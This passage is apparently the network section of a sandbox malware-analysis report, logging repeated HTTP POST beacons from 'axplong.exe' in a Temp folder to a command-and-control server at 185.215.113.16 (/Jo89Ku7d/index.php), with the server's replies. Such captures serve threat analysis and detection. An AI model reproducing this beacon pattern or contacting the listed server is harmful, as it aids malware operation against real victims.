                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:12.419078112 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    33192.168.2.749738185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:12.540992975 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:13.309009075 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:13.309773922 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:13.559909105 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    34192.168.2.749739185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:13.681185007 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:14.420831919 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:14.421703100 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:14.675081015 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    35192.168.2.749740185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:14.790150881 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:15.583616972 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:15.584462881 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:15.837414980 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    36192.168.2.749741185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:15.961630106 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:16.775984049 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:16.776843071 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:17.036341906 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    37192.168.2.749742185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:17.178580046 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:17.936431885 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:17.981154919 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:18.231288910 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    38192.168.2.749743185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:18.484337091 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:19.281801939 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:19.282558918 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:19.533179998 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    39192.168.2.749744185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:19.649820089 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:20.415177107 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:20.415987968 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:20.669310093 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    40192.168.2.749745185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:20.790211916 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:21.527471066 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:21.626467943 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:21.873404026 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    41192.168.2.749746185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:21.993262053 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:22.774437904 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:22.777517080 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:23.039597988 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    42192.168.2.749747185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:23.152340889 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:23.928320885 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:23 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:23.929080009 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:24.176000118 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    43192.168.2.749748185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:24.290128946 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:25.029486895 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:25.030270100 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:25.291893005 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:25 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    44192.168.2.749749185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:25.402046919 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:26.158679008 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:26.159559965 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
